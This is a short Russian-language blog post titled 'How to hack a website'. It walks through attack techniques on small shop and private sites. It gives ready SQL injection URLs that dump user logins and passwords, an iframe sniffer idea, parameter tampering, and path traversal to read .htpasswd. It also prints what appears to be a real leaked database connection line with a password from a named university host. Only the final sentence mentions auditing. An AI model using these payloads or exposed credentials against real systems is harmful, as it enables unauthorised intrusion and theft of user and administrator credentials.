Как взломать сайт

Мой приятель хакер знает как взломать сайт. При том, не то что бы взломать — а «обрушить» наглухо весь сервер. Можно и 500 ошибку сделать. Ну с учётом того, что сервер этот не у провайдера — а у мелкого магазина или частника. Зачастую бытует мнение, что взломать можно всё что угодно и сделать можно всё то угодно, и перепрограммировать всё и вся, однако это не так! Хотите пример? Не возможно долететь в противоположную сторону Вселенной 🙂 Съели? Так что всё-таки ограничения есть везде. Предположим, что у вас сайт на готовом движке — тогда работа начинается прежде всего с того, что читаем в Гугле про уязвимости. Например: Джумла 1.5.1. Ага уязвимость через Редактор, через него залили в папку с картинками шел. Все CMS имеют 100% уязвимости.  Это один вариант и метод. Если самописная, то другой. В любом случае пробуем, вот примеры взлома: 

1. Вывести на экран при помощи подлома MySQL логин и пароль: https://localhost/path/user.php?id= -2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users—
   https://site/channel_detail.php?chid=-51+union+select+1,username,pwd,4,5,6,7,8,9,0,1,2,3,4,5,6+from+signup
2. Врезать свой iframe что бы получить доступ к родительскому окну взламываемой страницы: <iframe src=https://localhost/скрипт.php></iframe> в загружаемой врезке снифер для перехвата переменных. А перехватив… ужо енто другое дело…
3. В основном просто, можно в GET запросе в строке ввести вместо: ?id=3 ввести: ?id=2+1 и вести выведется товар с номером ТРИ — значит можно кое что ещё, например =-1
4. Или в поле ПОИСК вести банальную кавычку — получив на экран вместо привычного: Товары не найдены, вот такую ошибку системы: pibul2.psru.ac.th/~webmaster/
   mysql_connect error («localhost»,»webmaster»,»sake8124″) or die («??????????????? database ???????????»);
   $sql_query=»INSERT INTO `sakesan` ( `User_name` , `Date` ) VALUES (‘zzzzzzzzzzzz’, ‘zzzzzzzzzzzzz’)»;
   $result_new=mysql_db_query(«webmaster»,$sql_query);
   admin 123456
5. Или посмотреть исходный код, авторизовавшись кем-то, скачать форму к себе и попробовать передать POST, но уже со своими параметрами — вызвав сбой системы. Пример, вот через function выводятся номера страниц в php: 1,2,3,4… А вы передаёте -1 и MySQL выводя из БД читает на одно поле назад — выводя Ошибку и название поля с паролем Администратора.
6. Не рассказал ещё, про ../../../../../../../../../../../../../../../../../../../../../../../../.htpasswd которое выводится банально на экран, где логин, запись вида: super:NUhuhh98hihiuhhouhohouh
7. ddos — атака, отказ в обслуживании…
8. И многое другое…………… 🙂

Способов — бесчисленное множество. Однако методики похожи и порою требуют времени, для различных попыток и их комбинацию. Конечно, всё это не законно, поэтому мы и проводим аудит и уязвимости сайта. Нужно понимать, что что-то можно взломать или как взломать сайт, а что-то нет — обычными методами.